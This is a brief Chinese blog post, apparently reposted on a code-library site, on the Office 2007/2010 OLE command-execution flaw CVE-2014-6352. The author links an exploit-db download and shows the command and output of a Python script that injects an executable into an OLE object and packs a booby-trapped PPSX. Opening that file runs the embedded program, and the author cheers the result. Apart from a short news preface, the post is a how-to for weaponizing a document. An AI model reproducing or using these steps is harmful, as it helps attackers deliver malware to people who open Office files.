首页 > 代码库 > MS Office 2007 and 2010 - OLE Arbitrary Command Execution
MS Office 2007 and 2010 - OLE Arbitrary Command Execution
之前看到freebuf上面的一篇文章,被台湾黑客拿去搞APT。期待了好久,终于放出POC了。
Xecure lab在10月17号发现变种的0day漏洞 沙虫(CVE-2014-4114 )已经被用在针对台湾政府以及各单位的APT攻击中,目前主流的杀毒软件还没办法有效地检测。该变种能够直接内嵌恶意软件,并本地触发执行,不需要再从远程共享服务器上下载恶意代码。
http://www.freebuf.com/vuls/48601.html
http://www.exploit-db.com/exploits/35229/
下载 http://www.exploit-db.com/sploits/35216.rar 解压
我在tmp同目录下放入一个exe文件
然后用python脚本生成
E:\tools\tools\35216>E:\tools\tools\35216\CVE-2014-6352.py E:\tools\tools\35216\
cmd.exe
[+] Injected exe into OLE
[+] packing exploit ppsx
[+] Done
E:\tools\tools\35216>
生成成功
打开PPSX文件,弹弹弹弹弹!!!
MS Office 2007 and 2010 - OLE Arbitrary Command Execution
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。